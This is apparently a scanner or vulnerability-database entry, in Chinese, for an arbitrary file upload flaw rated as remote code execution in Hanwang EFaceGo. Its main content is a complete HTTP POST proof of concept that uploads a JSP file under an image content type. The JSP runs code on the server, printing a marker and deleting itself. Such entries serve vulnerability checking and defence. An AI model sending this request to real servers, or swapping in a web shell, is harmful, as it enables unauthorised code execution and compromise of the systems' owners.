vendor = "汉王"
name = "汉王EFaceGo monadFileUpload.do 任意文件上传"
type = "RCE"
version = "未知"
path = "/manage/leaveList/monadFileUpload.do"
detail = "POST /manage/leaveList/monadFileUpload.do?recoToken=67mds2pxXQb&type HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBundaryFfJZ4P1AZBixjELj ----WebKitFormBundaryFfJZ4P1AZBixjELj Content-Disposition: form-data; name=\"file\"; filename=\"ncbegw.jsp\" Content-Type: image/jpeg <% out.println(\"pboyjnnrfipmplsukdeczudsefxmywe\"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ----WebKitFormBundaryFfJZ4P1AZBixjELj"
fix = "未知"
date = "0721"
label = "1day"
verifier = "AdySec"
